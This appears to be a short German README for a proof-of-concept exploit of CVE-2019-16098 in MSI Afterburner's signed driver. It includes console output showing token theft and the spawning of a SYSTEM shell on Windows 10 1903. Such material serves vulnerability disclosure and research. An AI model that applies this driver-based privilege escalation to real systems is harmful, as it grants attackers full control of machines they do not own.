CVE 2019 16098
1.0.0
Der Treiber in Micro-Star MSI Afterburner 4.6.2.15658 (auch bekannt als rtcore64.sys und rtcore32.sys) ermöglicht jedem authentifizierten Benutzer das Lesen und Schreiben in willkürlicher Speicher, E/A-Ports und MSRs. Dies kann für die Eskalation von Privilegien, die Codeausführung unter hohen Berechtigungen und die Offenlegung von Informationen ausgenutzt werden. Diese signierten Treiber können auch verwendet werden, um die Richtlinie zur Bereitstellung von böswilligen Code zu umgehen.
Weitere Updates finden Sie unter CVE-2019-16098
WARNUNG : Hartcodierte Windows 10 X64 Version 1903 Offsets!
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
Barakat
C:UsersBarakatsourcereposCVE-2019-16098>outbuildx64-DebugCVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
SYSTEM
C:UsersBarakatsourcereposCVE-2019-16098>
